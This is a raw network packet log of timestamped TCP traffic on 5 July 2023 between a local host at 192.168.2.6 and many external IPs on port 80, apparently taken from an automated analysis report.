                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.836389065 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.837075949 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.837126970 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.837173939 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.837224007 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.837274075 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.837363958 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.837436914 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.838051081 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.838100910 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.838135004 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.838169098 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.838219881 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.838442087 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.838481903 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.838942051 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.838992119 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.839040041 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.839087963 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.839138985 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.839226961 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.839302063 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.840049982 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.840099096 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.840146065 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.840193987 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.840240955 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.840369940 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.840432882 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.840908051 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.840958118 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.841006041 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.841056108 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.841146946 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.841212034 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.841283083 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.841867924 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.842176914 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.864065886 CEST804976181.2.194.241192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.864321947 CEST4976180192.168.2.681.2.194.241
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.866034031 CEST8049744104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.866575003 CEST8049744104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.866719961 CEST4974480192.168.2.6104.196.26.65
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.871301889 CEST8049762162.43.120.128192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.872683048 CEST8049762162.43.120.128192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.872812033 CEST4976280192.168.2.6162.43.120.128
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.936172009 CEST4974480192.168.2.6104.196.26.65
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940346003 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940402985 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940450907 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940515995 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940565109 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940599918 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940638065 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940638065 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940649033 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940743923 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940745115 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940793991 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940799952 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.940845013 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941129923 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941183090 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941214085 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941241980 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941251040 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941306114 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941312075 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941375017 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941812992 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941867113 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941895962 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941915035 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941934109 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.941963911 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942001104 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942006111 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942028999 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942070961 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942677975 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942729950 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942779064 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942780972 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942806005 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942830086 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942842007 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942881107 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942888975 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.942940950 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.943633080 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.943751097 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.943757057 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.943803072 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.943837881 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.943851948 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.943867922 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.943902016 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.943917990 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.943967104 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.944562912 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.944669008 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.944708109 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.944719076 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.944739103 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.944761038 CEST8049764104.21.66.46192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.944767952 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.944813967 CEST4976480192.168.2.6104.21.66.46
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.015443087 CEST4976580192.168.2.6210.140.73.39
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.086062908 CEST8049744104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.086445093 CEST8049744104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.086581945 CEST4974480192.168.2.6104.196.26.65
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.131239891 CEST4970980192.168.2.6137.118.26.67
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.131340981 CEST4970780192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.150500059 CEST8049707192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.150613070 CEST4970780192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.155812025 CEST4970780192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.174936056 CEST8049707192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.175086975 CEST8049707192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.175230026 CEST4970780192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.192923069 CEST4970780192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.212461948 CEST8049707192.124.249.20192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.212614059 CEST4970780192.168.2.6192.124.249.20
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.286931038 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.288299084 CEST4976780192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.306838036 CEST80497663.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.306946993 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.307508945 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.327222109 CEST80497663.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.327805996 CEST80497663.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.327893972 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.329194069 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.348680973 CEST4976880192.168.2.6104.26.6.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.350228071 CEST80497663.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.350303888 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.352674961 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.365264893 CEST8049768104.26.6.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.365462065 CEST4976880192.168.2.6104.26.6.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.365989923 CEST4976880192.168.2.6104.26.6.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.372919083 CEST80497663.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.373045921 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.374195099 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.382467985 CEST8049768104.26.6.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.391805887 CEST8049768104.26.6.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.391906023 CEST4976880192.168.2.6104.26.6.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.393201113 CEST4976880192.168.2.6104.26.6.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.394474030 CEST80497663.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.394546986 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.395781994 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.413291931 CEST8049768104.26.6.221192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.413394928 CEST4976880192.168.2.6104.26.6.221
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.415880919 CEST80497663.65.101.129192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.415973902 CEST4976680192.168.2.63.65.101.129
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.428137064 CEST4971680192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.444950104 CEST8049716188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.445051908 CEST4971680192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.453078985 CEST804976769.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.453247070 CEST4976780192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.489501953 CEST4971680192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.489567995 CEST4976780192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.506369114 CEST8049716188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.516963959 CEST8049716188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.517041922 CEST4971680192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.654465914 CEST804976769.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.655412912 CEST804976769.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.655591011 CEST4976780192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.656342030 CEST804976769.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.656413078 CEST4976780192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.675848961 CEST4976780192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.676487923 CEST4976980192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.840682030 CEST804976769.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.842927933 CEST804976969.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.844891071 CEST4976980192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.845315933 CEST4976980192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.896943092 CEST4975680192.168.2.6198.100.146.220
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.011907101 CEST804976969.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.012833118 CEST804976969.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.013108015 CEST4976980192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.013473034 CEST804976969.163.218.51192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.013540983 CEST4976980192.168.2.669.163.218.51
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.288938999 CEST804973872.44.93.236192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.293164015 CEST4973880192.168.2.672.44.93.236
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.329236984 CEST4977080192.168.2.6147.154.3.56
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.438404083 CEST8049770147.154.3.56192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.438599110 CEST4977080192.168.2.6147.154.3.56
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.439121962 CEST4977080192.168.2.6147.154.3.56
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.489331961 CEST804973966.94.119.160192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.489434004 CEST4973980192.168.2.666.94.119.160
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.548115015 CEST8049770147.154.3.56192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.568075895 CEST8049770147.154.3.56192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.568188906 CEST4977080192.168.2.6147.154.3.56
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.569569111 CEST8049770147.154.3.56192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.569809914 CEST4977080192.168.2.6147.154.3.56
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.657769918 CEST4977180192.168.2.6172.67.70.22
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.674801111 CEST8049771172.67.70.22192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.674937963 CEST4977180192.168.2.6172.67.70.22
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.687621117 CEST4977180192.168.2.6172.67.70.22
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.687875986 CEST804974296.127.180.42192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.688029051 CEST4974280192.168.2.696.127.180.42
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.704484940 CEST8049771172.67.70.22192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.715810061 CEST8049771172.67.70.22192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.715853930 CEST8049771172.67.70.22192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.715887070 CEST8049771172.67.70.22192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.715915918 CEST8049771172.67.70.22192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.715933084 CEST8049771172.67.70.22192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.715950012 CEST8049771172.67.70.22192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.716063976 CEST4977180192.168.2.6172.67.70.22
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.716063976 CEST4977180192.168.2.6172.67.70.22
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.775217056 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.852988005 CEST4977380192.168.2.634.117.168.233
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.867993116 CEST804977334.117.168.233192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.869185925 CEST4977380192.168.2.634.117.168.233
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.869539022 CEST4977380192.168.2.634.117.168.233
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.884432077 CEST804977334.117.168.233192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.896655083 CEST804977334.117.168.233192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.896873951 CEST4977380192.168.2.634.117.168.233
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.905136108 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.905249119 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.960402966 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.090409994 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.161288977 CEST4977480192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.178272963 CEST8049774188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.178401947 CEST4977480192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.192589998 CEST4977480192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.209481955 CEST8049774188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.220801115 CEST8049774188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.221142054 CEST4977480192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.284173965 CEST8049747122.128.109.107192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.285105944 CEST4974780192.168.2.6122.128.109.107
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.465090990 CEST4977580192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.481976032 CEST8049775188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.485188007 CEST4977580192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.486752987 CEST4977580192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.503492117 CEST8049775188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.509732962 CEST804974060.43.154.138192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.509821892 CEST4974080192.168.2.660.43.154.138
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678303957 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678380013 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678430080 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678473949 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678519964 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678569078 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678586960 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678620100 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678641081 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678651094 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678670883 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678694010 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678726912 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678775072 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678780079 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678800106 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.678828955 CEST4977280192.168.2.674.208.236.101
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.721534967 CEST8049775188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.721575022 CEST8049775188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.721823931 CEST4977580192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.754302979 CEST4977680192.168.2.6206.191.152.37
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.755248070 CEST4977580192.168.2.6188.114.96.7
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.771784067 CEST8049775188.114.96.7192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.808667898 CEST804977274.208.236.101192.168.2.6
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.808706045 CEST804977274.208.236.101192.168.2.6
